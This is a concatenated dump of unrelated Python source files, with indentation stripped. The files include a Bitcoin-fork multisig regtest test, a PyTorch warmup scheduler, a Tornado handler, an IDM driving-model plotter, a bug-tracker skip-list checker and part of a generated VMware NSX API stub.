if bytes_per_sec_total is not None:
self.bytes_per_sec_total = bytes_per_sec_total
if direction is not None:
self.direction = direction
if local_pod is not None:
self.local_pod = local_pod
if remote_pod is not None:
self.remote_pod = remote_pod
if remotes is not None:
self.remotes = remotes
if time is not None:
self.time = time
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReplicaLinkPerformanceReplication`".format(key))
if key == "bytes_per_sec_from_remote" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_sec_from_remote`, must be a value greater than or equal to `0`")
if key == "bytes_per_sec_to_remote" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_sec_to_remote`, must be a value greater than or equal to `0`")
if key == "bytes_per_sec_total" and value is not None:
if value < 0:
raise ValueError("Invalid value for `bytes_per_sec_total`, must be a value greater than or equal to `0`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReplicaLinkPerformanceReplication, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReplicaLinkPerformanceReplication):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
py | b4110975bb7a800872a0c9cd438c40315c6e521b | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test new Cureoptedcoin multisig prefix functionality.
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class ScriptAddress2Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.setup_clean_chain = True
self.extra_args = [['-addresstype=legacy', '-deprecatedrpc=accounts', '-txindex=1'], [], ['-txindex=1']]
def setup_network(self, split=False):
self.setup_nodes()
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 0)
self.sync_all()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
cnt = self.nodes[0].getblockcount()
# Mine some blocks
self.nodes[1].generate(101)
self.sync_all()
if (self.nodes[0].getblockcount() != cnt + 101):
raise AssertionError("Failed to mine 100 blocks")
addr = self.nodes[0].getnewaddress()
addr2 = self.nodes[0].getnewaddress()
multisig_addr = self.nodes[0].addmultisigaddress(2, [addr, addr2], "multisigaccount")['address']
assert_equal(multisig_addr[0], 'Q')
# Send to a new multisig address
txid = self.nodes[1].sendtoaddress(multisig_addr, 1)
self.nodes[1].generate(101)
self.sync_all()
tx = self.nodes[0].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr in dest_addrs)
# Spend from the new multisig address
addr3 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr3, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.2)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr3)
# Send to an old multisig address. The api addmultisigaddress
# can only generate a new address so we manually compute
# multisig_addr_old beforehand using an old client.
priv_keys = ["cU7eeLPKzXeKMeZvnEJhvZZ3tLqVF3XGeo1BbM8dnbmV7pP3Qg89",
"cTw7mRhSvTfzqCt6MFgBoTBqwBpYu2rWugisXcwjv4cAASh3iqPt"]
addrs = ["mj6gNGRXPXrD69R5ApjcsDerZGrYKSfb6v",
"mqET4JA3L7P7FoUjUP3F6m6YsLpCkyzzou"]
self.nodes[0].importprivkey(priv_keys[0])
self.nodes[0].importprivkey(priv_keys[1])
multisig_addr_new = self.nodes[0].addmultisigaddress(2, addrs, "multisigaccount2")['address']
assert_equal(multisig_addr_new, 'QZ974ZrPrmqMmm1PSVp4m8YEgo3bCQZBbe')
multisig_addr_old = "2N5nLwYz9qfnGdaFLpPn3gS6oYQbmLTWPjq"
# Let's send to the old address. We can then find it in the
# new address with the new client. So basically the old
# address and the new one are the same thing.
txid = self.nodes[1].sendtoaddress(multisig_addr_old, 1)
self.nodes[1].generate(1)
self.sync_all()
tx = self.nodes[2].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr_new in dest_addrs)
assert(multisig_addr_old not in dest_addrs)
# Spend from the new multisig address
addr4 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr4, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.4)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr4)
if __name__ == '__main__':
ScriptAddress2Test().main()
|
py | b4110a8a71ddb134fdb435fc77828aef4a65a112 | import warnings
from torch.optim.lr_scheduler import _LRScheduler
class WarmupWarpper(_LRScheduler):
"""
"""
def __init__(self, scheduler, warmup_steps, total_num_update_steps, last_epoch=-1):
self.scheduler = scheduler
self.warmup_steps = warmup_steps
self.total_num_update_steps = total_num_update_steps
self.finished = False
super().__init__(scheduler.optimizer, last_epoch)
def get_lr(self):
if self.last_epoch > self.total_num_update_steps:
if not self.finished:
self.finished = True
return self.scheduler.get_last_lr()
elif self.last_epoch < self.warmup_steps:
multiplier = float(self.last_epoch) / float(max(1, self.warmup_steps))
return [lr * multiplier for lr in self.base_lrs]
else:
return self.scheduler.get_last_lr()
def step(self):
if self.last_epoch < self.warmup_steps:
super().step()
elif self.last_epoch < self.total_num_update_steps:
self.scheduler.step()
self._last_lr = self.scheduler.get_last_lr()
self.last_epoch += 1
else:
if self.last_epoch == self.total_num_update_steps:
warnings.warn("Learning rate scheduler steps have exceeded total_num_update_steps!")
super().step()
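# Minimal usage sketch. The optimizer, wrapped scheduler and step counts below
# are illustrative assumptions, not values required by this module.
if __name__ == "__main__":
    import torch
    from torch.optim.lr_scheduler import CosineAnnealingLR

    params = [torch.nn.Parameter(torch.zeros(1))]
    optimizer = torch.optim.SGD(params, lr=0.1)
    cosine = CosineAnnealingLR(optimizer, T_max=90)
    scheduler = WarmupWarpper(cosine, warmup_steps=10, total_num_update_steps=100)
    for _ in range(100):
        optimizer.step()   # normally preceded by loss.backward()
        scheduler.step()   # linear warmup first, then the wrapped cosine decay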
|
py | b4110b4d04ce90f3129fee5bd5796b66a63739f3 | import json
import logging
import re
import traceback
from datetime import datetime
import torndsession.sessionhandler
from . import error as err
from . import cache, vo
from .. import config
class Handler(torndsession.sessionhandler.SessionBaseHandler):
def prepare(self):
super().prepare()
logger = logging.getLogger('app')
logger.debug('{} {} {} {}'.format(
self.request.method, self.request.path,
self.request.arguments, self.request.headers))
def get_current_user(self):
return self.session.get('user', None)
def write_error(self, status_code, **kwargs):
if self.settings.get('serve_traceback') and 'exc_info' in kwargs:
message = traceback.format_exception(*kwargs['exc_info'])
else:
message = self._reason
error = err.Error(message)
return self.response_json(error, status_code)
def response_json(self, error=None, status_code=200, **kwargs):
data = {
'code': err.ERROR_CODE_OK,
'message': ''
}
if error:
data['code'] = error.code
data['message'] = (
error.message if (config.DEBUG and error.message) else
err.MESSAGES.get(error.code, '')
)
data.update(kwargs)
ua = self.request.headers.get('User-Agent', '')
if re.match(r'.+\s+MSIE\s+.+', ua):
content_type = 'text/html; charset=utf-8'
else:
content_type = 'application/json; charset=utf-8'
content = json.dumps(
vo.jsonable(data),
indent=(None if not config.DEBUG else 4),
ensure_ascii=False)
self.response(content, content_type, status_code)
def response_html(self, template, error=None, status_code=200, **kwargs):
data = {
'code': err.ERROR_CODE_OK,
'message': ''
}
if error:
data['code'] = error.code
data['message'] = (
error.message if (config.DEBUG and error.message) else
err.MESSAGES.get(error.code, '')
)
data.update(kwargs)
content = self.render_string(template, **data)
content_type = 'text/html; charset=utf-8'
self.response(content, content_type, status_code)
def response(self, content, content_type, status_code=200):
self.set_status(status_code)
self.set_header('Content-Type', content_type)
self.finish(content)
|
py | b4110b6ce5f00123b8ec8100f6f7ce5f3d3ea79b | #!/usr/bin/env python3
from math import sqrt
import fileinput
# Write a program that computes typical stats
# Count, Min, Max, Mean, Std. Dev, Median
# No, you cannot import any other modules!
data = []
for line in fileinput.input():
if line.startswith('#'): continue
line = line.rstrip()
data.append(float(line))
count = 0
sum = 0
for i in data:
count += 1
sum += i
mean = sum/count
s = 0
for i in data:
s += (i - mean) ** 2
sd = (s / count) ** 0.5
data.sort()
min = data[0]
max = data[-1]
if count % 2 == 0:
m = int((len(data)/2) - 1)
n = int(len(data)/2)
med = (data[m] + data[n]) / 2
else:
m = int((len(data)/2) - 0.5)
med = data[m]
print(f'Count: {count}')
print(f'Minimum: {min}')
print(f'Maximum: {max}')
print(f'Mean: {mean}')
print(f'Std. dev: {sd:.3f}')
print(f'Median: {med}')
"""
python3 stats.py numbers.txt
Count: 10
Minimum: -1.0
Maximum: 256.0
Mean: 29.147789999999997
Std. dev: 75.777
Median: 2.35914
"""
|
py | b4110cb85a170a64d20bb18ccceea6057247ab9d | import re
import random
import itertools
import math
from collections import defaultdict
from src.utilities import *
from src import users, channels, status, debuglog, errlog, plog
from src.functions import get_players, get_all_players
from src.decorators import command, event_listener
from src.containers import UserList, UserSet, UserDict, DefaultUserDict
from src.messages import messages
from src.status import try_misdirection, try_exchange
@event_listener("transition_night_end", priority=5)
def on_transition_night_end(evt, var):
for blessed in get_all_players(("blessed villager",)):
status.add_protection(var, blessed, blessed, "blessed villager")
if var.NIGHT_COUNT == 1 or var.ALWAYS_PM_ROLE:
to_send = "blessed_notify"
if blessed.prefers_simple():
to_send = "blessed_simple"
blessed.send(messages[to_send])
@event_listener("myrole")
def on_myrole(evt, var, user):
if user in var.ROLES["blessed villager"]:
evt.data["messages"].append(messages["blessed_simple"])
@event_listener("get_role_metadata")
def on_get_role_metadata(evt, var, kind):
if kind == "role_categories":
evt.data["blessed villager"] = {"Village"}
# vim: set sw=4 expandtab:
|
py | b4110d4e61ca4c7da86e00bfb119f3b1f46c1d63 | import math
def square_of_sum(num):
"""Returns square of sum of N integers."""
squares = 0
for i in range(1, num + 1):
squares += i
return math.pow(squares, 2)
def sum_of_squares(num):
"""Returns sum of square of N integers."""
sums = 0
for i in range(1, num + 1):
sums += math.pow(i, 2)
return sums
def difference(num):
"""Returns difference between square_of_sum and sum_of_square
for first N integers."""
return square_of_sum(num) - sum_of_squares(num)
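# Minimal usage sketch (the classic Project Euler #6 quantities for N = 10;
# the expected values follow directly from the definitions above):
if __name__ == "__main__":
    print(square_of_sum(10))   # 3025.0
    print(sum_of_squares(10))  # 385.0
    print(difference(10))      # 2640.0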
|
py | b4110d56557a84933b3dbbee5c38b0e0785ba00f | import pandas as pd
import os
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
import math
class idm_behavior_analysis():
'''
    Purpose: Creates a mesh plot of acceleration values based
        on IDM parameters and limits of velocity changes
    :param idm_params: dictionary of all IDM params
        key=parameter name => value
    :param plot_name: name of the plot file saved under
        "IDM Behavior Plots" in the current working directory
    :param speed_limits: list containing the minimum
        and maximum speeds
'''
def __init__(self, idm_params, plot_name, speed_limits = [0,100]):
self.idm_params=idm_params
self.file_location = os.getcwd() + "/IDM Behavior Plots/" + plot_name
# create linspace for both velocity inputs
self.x = np.linspace(speed_limits[0], speed_limits[1], speed_limits[1] * 10)
self.y = np.linspace(speed_limits[0], speed_limits[1], speed_limits[1] * 10)
self.v_max = speed_limits[1]
        # create meshgrid of the current velocity (v) and the desired velocity (v_des)
self.v, self.v_des = np.meshgrid(self.x, self.y)
self.equation()
self.create_plot()
self.create_csv()
def equation(self):
# Implement IDM behavior model equation to calculate the acceleration
self.acceleration = self.idm_params['accel']*(1-(self.v/self.v_max)**self.idm_params['delta']-((self.idm_params['minGap'] + self.idm_params['tau'] * self.v \
+ (self.v*(self.v-self.v_des))/(2*math.sqrt(self.idm_params['accel']*self.idm_params['decel'])))/self.idm_params['minGap'])**2)
self.acceleration = np.where(self.acceleration < -self.idm_params['emergencyDecel'], -self.idm_params['emergencyDecel'], self.acceleration)
return
def create_plot(self):
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.contour3D(self.v, self.v_des, self.acceleration, 50, cmap='binary')
ax.set_xlabel('IDM Velocity')
ax.set_ylabel('Desired Velocity')
ax.set_zlabel('Acceleration')
fig.savefig(self.file_location)
return
def create_csv(self):
#TODO: add method to create csv, may be unnecessary
return
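# Minimal usage sketch; the IDM parameter values below are illustrative
# assumptions, not values taken from this project.
if __name__ == "__main__":
    os.makedirs(os.path.join(os.getcwd(), "IDM Behavior Plots"), exist_ok=True)
    example_params = {
        'accel': 1.0, 'decel': 1.5, 'emergencyDecel': 4.5,
        'minGap': 2.5, 'tau': 1.0, 'delta': 4,
    }
    idm_behavior_analysis(example_params, plot_name="example_idm_mesh",
                          speed_limits=[0, 30])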
|
py | b4110e417306f84c43ad6107014960a97500fbf0 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# flake8: noqa
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
import argparse
import bugzilla
import logging
import sys
import xmlrpclib
import yaml
from launchpadlib.launchpad import Launchpad
LOG = logging.getLogger(__name__)
OPEN = 1
CLOSED = 2
INVALID = 3
class LaunchpadConnector(object):
def __init__(self, cachedir='/tmp/.launchpadlib/cache/'):
self.cachedir = cachedir
self.lp = Launchpad.login_anonymously('Bugs', 'production', cachedir,
version='devel')
def get_bug_status(self, bug_id):
try:
bug = self.lp.bugs[bug_id]
            # We assume that the last task has the final status,
            # and we cannot slice from the end
task = bug.bug_tasks[len(bug.bug_tasks) - 1]
if task:
if task.status in ['Fix Released', 'Fix Committed', 'Invalid']:
return CLOSED
else:
return OPEN
except KeyError:
LOG.error('Bug {} does not exist in launchpad'.format(bug_id))
return INVALID
class BugzillaConnector(object):
def __init__(self, url='https://bugzilla.redhat.com/xmlrpc.cgi'):
self.bugzilla = bugzilla.Bugzilla(url=url)
def get_bug_status(self, bug_id):
try:
bug = self.bugzilla.getbug(bug_id)
if bug.status == 'CLOSED':
return CLOSED
else:
return OPEN
except xmlrpclib.Fault as err:
# Fault code 102 means it's a private bug and we don't have
# permission to see, so we can't confirm if it's closed
if err.faultCode == 102:
return OPEN
LOG.error('Bug {} failed with fault code {}'.format(bug_id,
err.faultCode))
return INVALID
class VerifyBug(object):
def __init__(self):
self.bugzilla = BugzillaConnector()
self.launchpad = LaunchpadConnector()
def check_bug_status(self, url):
connector = self._get_connector(url)
bug_id = self._get_id_from_url(url)
return connector.get_bug_status(bug_id)
def is_bug_open(self, url):
status = self.check_bug_status(url)
if status in [CLOSED, INVALID]:
return False
else:
return True
def _get_id_from_url(self, url):
if 'launchpad' in url:
# The format is https://bugs.launchpad.net/tripleo/+bug/1577769
return int(url.split('/')[-1])
elif 'bugzilla' in url:
return int(url.split('=')[-1])
def _get_connector(self, url):
if 'launchpad' in url:
return self.launchpad
elif 'bugzilla' in url:
return self.bugzilla
else:
raise ValueError('Cannot find a connector for {}'.format(url))
class BugVerifyCmd(object):
def __init__(self):
self.skipped_failures = []
def parse_arguments(self, args):
parser = argparse.ArgumentParser(description='Bug verify')
parser.add_argument('--skip-file', dest='skip_file',
help='Load skip file', required=True)
parser.add_argument('--output', action='store_true',
help='Print the output')
parser.add_argument('--format', dest='output_format',
default='yaml', help='Output format',
choices=['yaml', 'txt'])
parser.add_argument('--to-file', dest='to_file',
help='Save the skip list to a file')
parser.add_argument('--report', dest='report', action='store_true',
help='Shows report at the end')
parser.add_argument('--debug', dest='debug', action='store_true',
help='Enable debug')
self.args = parser.parse_args(args)
def setup_logging(self):
level = logging.DEBUG if self.args.debug else logging.INFO
logging.basicConfig(level=level,
format='%(asctime)s %(levelname)s %(name)s: '
'%(message)s')
def load_skip_file(self):
known_failures = []
try:
with open(self.args.skip_file) as f:
skip = yaml.safe_load(f)
for t in skip.get('known_failures'):
bug = {'test': t.get('test'), 'reason': t.get('reason')}
if t.get('lp'):
bug['lp'] = t.get('lp')
if t.get('bz'):
bug['bz'] = t.get('bz')
known_failures.append(bug)
except yaml.constructor.ConstructorError:
LOG.error('Invalid yaml file {}'.format(self.args.skip_file))
except IOError:
LOG.error('File not found {}'.format(self.args.skip_file))
finally:
return known_failures
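    # The skip file parsed above is expected to look roughly like this
    # (test names and URLs are illustrative, not real entries):
    #
    #   known_failures:
    #     - test: tempest.api.compute.test_example
    #       reason: flaky on slow nodes
    #       lp: https://bugs.launchpad.net/tripleo/+bug/1577769
    #     - test: tempest.api.network.test_other
    #       reason: known product bug
    #       bz: https://bugzilla.redhat.com/show_bug.cgi?id=123456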
def _print_yaml(self, known_failures):
return yaml.dump({'known_failures': known_failures},
default_flow_style=False,
explicit_start=True)
def _print_txt(self, known_failures):
output = ''
for bug in known_failures:
output += '# {}\n'.format(bug.get('reason'))
output += '{}\n'.format(bug.get('test'))
return output
def get_output(self, known_failures, output_format):
output = ''
if output_format == 'txt':
output = self._print_txt(known_failures)
elif output_format == 'yaml':
output = self._print_yaml(known_failures)
else:
raise ValueError(
'Output format not supported: {}'.format(output_format))
return output
def print_output(self, known_failures, output_format):
print(self.get_output(known_failures, output_format))
def show_report(self):
print('Here\'s the original list:')
self.print_output(self.original_failures, self.args.output_format)
print('\n\n')
print('Here\'s the skipped list:')
self.print_output(self.skipped_failures, self.args.output_format)
    def save_output(self, known_failures, output_format):
        output = self.get_output(known_failures, output_format)
        with open(self.args.to_file, 'w') as f:
            f.write(output)
def run(self):
known_failures = self.load_skip_file()
self.original_failures = known_failures
open_failures = []
v_bug = VerifyBug()
for bug in known_failures:
LOG.debug('Checking bug: {}'.format(bug))
if not bug.get('lp') and not bug.get('bz'):
open_failures.append(bug)
continue
bug_url = bug.get('lp') or bug.get('bz')
if not v_bug.is_bug_open(bug_url):
self.skipped_failures.append(bug)
else:
open_failures.append(bug)
if self.args.output:
self.print_output(open_failures, self.args.output_format)
if self.args.to_file:
self.save_output(open_failures, self.args.output_format)
if self.args.report:
self.show_report()
def main():
bvc = BugVerifyCmd()
bvc.parse_arguments(sys.argv[1:])
bvc.setup_logging()
bvc.run()
if __name__ == '__main__':
sys.exit(main())
|
py | b4110ea1f35fa4f8af71f3465d12492ce5bc324a | #!/usr/bin/env python
from setuptools import setup, find_packages
from os import path
this_directory = path.abspath(path.dirname(__file__))
# could add encoding='utf-8' if needed
with open(path.join(this_directory, 'cued_sf2_lab', '_version.py')) as f:
exec(f.read())
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='cued_sf2_lab',
version=__version__, # noqa: F821
license='MIT',
description='IIA Engineering SF2 Lab',
long_description=long_description,
long_description_content_type='text/markdown',
author='Areeg Emarah',
maintainer='Areeg Emarah',
maintainer_email='[email protected]',
url='https://github.com/areeg-98/IIB_project',
packages=find_packages(),
install_requires=[
'numpy',
'scipy',
'matplotlib',
'ipympl'
],
# {'package_name': 'folder_with_its_source'}
package_dir={'cued_sf2_lab': 'cued_sf2_lab'},
classifiers=[
# 'Intended Audience :: Science/Research',
# 'Topic :: Scientific/Engineering :: Mathematics',
# 'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
project_urls={
# "Bug Tracker": "https://github.com/pygae/clifford/issues",
"Source Code": "https://github.com/areeg-98/IIB_project",
},
python_requires='>=3.5',
)
|
py | b4110f0481294c69d38c3480b6d5ada765468cb2 | def palin(word):
    # Build the reversed string one character at a time.
    s = ""
    for i in range(len(word)):
        s = s + word[len(word) - i - 1]
    if s == word:
        print(word, "is a Palindrome")
    else:
        print(word, "isn't a palindrome")
py | b4111001692f1d66f43fa04098ad0c86c8b7b98a | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2019 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.serviceinsertion.services.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class ServiceInstances(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.serviceinsertion.services.service_instances'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ServiceInstancesStub)
def create(self,
service_id,
base_service_instance,
):
"""
Adds a new Service-Instance under the specified Service.
:type service_id: :class:`str`
:param service_id: (required)
:type base_service_instance: :class:`vmware.vapi.struct.VapiStruct`
:param base_service_instance: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseServiceInstance
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'service_id': service_id,
'base_service_instance': base_service_instance,
})
def delete(self,
service_id,
service_instance_id,
):
"""
Delete existing Service-Instance for a given Service-Insertion Service.
:type service_id: :class:`str`
:param service_id: (required)
:type service_instance_id: :class:`str`
:param service_instance_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'service_id': service_id,
'service_instance_id': service_instance_id,
})
def get(self,
service_id,
service_instance_id,
):
"""
Returns Service-Instance information for a given Service-Insertion
Service.
:type service_id: :class:`str`
:param service_id: (required)
:type service_instance_id: :class:`str`
:param service_instance_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseServiceInstance
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'service_id': service_id,
'service_instance_id': service_instance_id,
})
def list(self,
service_id,
):
"""
Returns all Service-Instance(s) for a given Service-Insertion Service.
:type service_id: :class:`str`
:param service_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ServiceInstanceListResult`
:return: com.vmware.nsx.model.ServiceInstanceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'service_id': service_id,
})
def update(self,
service_id,
service_instance_id,
base_service_instance,
):
"""
Modifies an existing Service-Instance for a given Service-Insertion
Service.
:type service_id: :class:`str`
:param service_id: (required)
:type service_instance_id: :class:`str`
:param service_instance_id: (required)
:type base_service_instance: :class:`vmware.vapi.struct.VapiStruct`
:param base_service_instance: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseServiceInstance
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseServiceInstance`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'service_id': service_id,
'service_instance_id': service_instance_id,
'base_service_instance': base_service_instance,
})
class _ServiceInstancesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'base_service_instance': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances',
request_body_parameter='base_service_instance',
path_variables={
'service_id': 'service-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'service_instance_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances/{service-instance-id}',
path_variables={
'service_id': 'service-id',
'service_instance_id': 'service-instance-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'service_instance_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
